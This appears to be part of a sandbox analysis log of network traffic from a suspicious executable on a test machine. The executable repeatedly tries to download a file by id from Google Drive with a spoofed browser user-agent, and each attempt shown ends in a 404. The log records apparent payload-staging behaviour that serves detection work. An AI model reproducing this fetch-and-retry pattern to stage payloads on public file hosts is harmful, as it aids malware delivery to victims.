                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:12 UTC | 1652 | IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="epZkyEgRyrXM8BlOnoTqmA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    60 | 192.168.2.7 | 52245 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:12 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:13 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:13 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-DGzihbFqdxfLbcEku2JS7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    61 | 192.168.2.7 | 52246 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:13 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:14 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC5LbuqbSvEbqSLdGWvuLGqnxUjQ2BD2TuRfWPix9tryIF6dBEE8LZCj7rQ3YFnCboWOw9JWCOI
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:14 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: script-src 'nonce-nwpEcFl54kIq_lOwwzg0Qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:14 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6iYl94EbFOPu9O4q11Q4Ig">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    62 | 192.168.2.7 | 52247 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:15 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:15 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:15 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-Go-Ad2h2cNu1xzGl910-uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    63 | 192.168.2.7 | 52248 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:16 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:16 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC5Gr6TEF7uEmVvbqw8DUGGuffu-VDXaxs5Ue-FiRjd3fE5aMZ3iGD9kA45FIKsNiU9tgWvC0Ks
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:16 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-JbJgZJ1SAzmhQgKqq-3dLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:16 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bhLEJ3Du1KzALwAG5PM_Aw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    64 | 192.168.2.7 | 52249 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:17 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:17 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:17 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-cIjSTrM-zqqvMz3jUQ3vRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    65 | 192.168.2.7 | 52250 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:18 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:19 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgTf4FXDoalZDwr04025LGVKQSPmSk6BnRYaaRJULhZDYftohSGpwBVeGGd8FeQUe1xD
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:19 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: script-src 'nonce-AGraDgHtaRFvNcblfixvfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:19 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Q5J-ZspMNaxejYAcE6jijQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    66 | 192.168.2.7 | 52251 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:19 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:20 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:20 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce--DbxiLZO1TKN-q586Kkxgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    67 | 192.168.2.7 | 52252 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:20 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:21 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgSL1uz_VrH_36FkOgcSfjl9mZ7z2oiNphIP-6Mh5y_yueGT42ql66dK6WLcIM5bUuR078VjD24
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:21 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-S9SwmJFYe-CTa6FZOAk84g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:21 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Hu1JhrKrNVoIgqyf_Q_7IQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    68 | 192.168.2.7 | 52253 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:22 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:22 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:22 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-MHqpkwNB1sq08VdOB-MYVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
